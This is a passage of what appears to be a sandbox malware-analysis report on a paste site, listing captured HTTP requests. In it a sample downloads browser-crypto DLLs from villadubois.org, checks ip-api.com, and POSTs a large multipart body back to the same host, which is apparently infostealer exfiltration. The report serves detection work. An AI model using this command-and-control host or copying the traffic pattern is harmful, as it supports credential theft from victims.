  626. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: villadubois.org\r\nConnection: Keep-Alive\r\n\r\n",
  627. "port": 80
  628.  
  629.  
  630. "count": 1,
  631. "body": "",
  632. "uri": "http://villadubois.org/msvcp140.dll",
  633. "user-agent": "",
  634. "method": "GET",
  635. "host": "villadubois.org",
  636. "version": "1.1",
  637. "path": "/msvcp140.dll",
  638. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: villadubois.org\r\nConnection: Keep-Alive\r\n\r\n",
  639. "port": 80
  640.  
  641.  
  642. "count": 1,
  643. "body": "",
  644. "uri": "http://villadubois.org/nss3.dll",
  645. "user-agent": "",
  646. "method": "GET",
  647. "host": "villadubois.org",
  648. "version": "1.1",
  649. "path": "/nss3.dll",
  650. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: villadubois.org\r\nConnection: Keep-Alive\r\n\r\n",
  651. "port": 80
  652.  
  653.  
  654. "count": 1,
  655. "body": "",
  656. "uri": "http://villadubois.org/softokn3.dll",
  657. "user-agent": "",
  658. "method": "GET",
  659. "host": "villadubois.org",
  660. "version": "1.1",
  661. "path": "/softokn3.dll",
  662. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: villadubois.org\r\nConnection: Keep-Alive\r\n\r\n",
  663. "port": 80
  664.  
  665.  
  666. "count": 1,
  667. "body": "",
  668. "uri": "http://villadubois.org/vcruntime140.dll",
  669. "user-agent": "",
  670. "method": "GET",
  671. "host": "villadubois.org",
  672. "version": "1.1",
  673. "path": "/vcruntime140.dll",
  674. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: villadubois.org\r\nConnection: Keep-Alive\r\n\r\n",
  675. "port": 80
  676.  
  677.  
  678. "count": 1,
  679. "body": "--1BEF0A57BE110FD467A--\r\n",
  680. "uri": "http://ip-api.com/line/",
  681. "user-agent": "",
  682. "method": "POST",
  683. "host": "ip-api.com",
  684. "version": "1.1",
  685. "path": "/line/",
  686. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  687. "port": 80
  688.  
  689.  
  690. "count": 1,
  691. "body": "",
  692. "uri": "http://villadubois.org/",
  693. "user-agent": "",
  694. "method": "POST",
  695. "host": "villadubois.org",
  696. "version": "1.1",
  697. "path": "/",
  698. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40783\r\nHost: villadubois.org\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  699. "port": 80
  700.  
  701.  
  702.  
  703. * Network Communication - SMTP:
  704.  
  705. * Network Communication - Hosts:
  706.  
  707. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment